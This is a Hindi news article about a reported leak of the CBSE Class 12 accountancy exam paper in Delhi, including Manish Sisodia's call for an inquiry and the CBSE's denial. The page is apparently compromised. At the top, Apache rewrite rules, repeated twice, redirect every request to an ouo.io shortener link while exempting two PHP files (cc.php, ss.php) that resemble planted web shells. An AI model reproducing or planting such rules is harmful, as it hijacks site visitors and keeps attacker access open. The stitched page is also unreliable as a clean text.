
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 743
नई दिल्ली। दिल्ली में सीबीएसई के 12वीं क्लास का पेपर लीक होने का मामला सामने आया है। खबरों के मुताबिक अकाउंट का पेपर लीक हुआ है। अकाउंट के पेपर की परीक्षा आज ही होनी थी। हालांकि सीबीएसई ने जांच के बाद पेपर लीक होने की खबर को गलत बताया है।
रिपोर्ट के मुताबिक आज सुबह से ही वॉट्सऐप पर अकाउंट का पेपर सर्कुलेट हो रहा था। सुबह करीब पौने दस बजे अकाउंट का पेपर सेंटरों के लिए भेजा गया था। सीबीएसई के अकाउंट पेपर के सेट 2 का प्रश्नपत्र लीक होने की खबर है। इस बीच, सीबीएसई ने एक्सपर्ट कमिटी का गठन किया है जो पेपर लीक की जांच करेगा। पेपर लीक की खबरों पर दिल्ली के डेप्युटी सीएम मनीष सिसोदिया ने कहा है कि दोषियों के खिलाफ कड़ी कार्रवाई होगी। उन्होंने ट्वीट कर कहा, 'सीबीएसई के 12वीं क्लास के पेपर लीक होने की शिकायत मिली है। शिक्षा निदेशालय के अधिकारियों को मामले की जांच करने और इस बारे में शिकायत दर्ज करने को कहा गया है। उधर, सीबीएसई ने कहा कि कुछ शरारती तत्वों ने सोशल साइट पर पेपर लीक की अफवाह फैला थी। ऐसे लोगों के खिलाफ सख्त कार्रवाई की जाएगी। सीबीएसई अब पेपर लीक की अफवाह फैलाने वालों के खिलाफ एफआईआर दर्ज करवाएगी। इससे पहले खबर थी कि परीक्षा शुरू होने से पहले अकाउंटेंसी का पेपर लीक हो गया है।
सिसोदिया ने एक ट्वीट में कहा था कि 12वीं कक्षा का अकाउंटेंसी का पेपर लीक होने की शिकायत मिली है। शिक्षा निदेशालय के अधिकारियों को इसकी जांच करने और शिकायत दर्ज करने को कहा है। मंत्री ने यह भी कहा कि इस मामले में त्वरित कार्रवाई की जानी चाहिए ताकि कठोर परिश्रम करने वाले छात्र केंद्रीय माध्यमिक शिक्षा बोर्ड की लापरवाही के कारण प्रभावित न हो।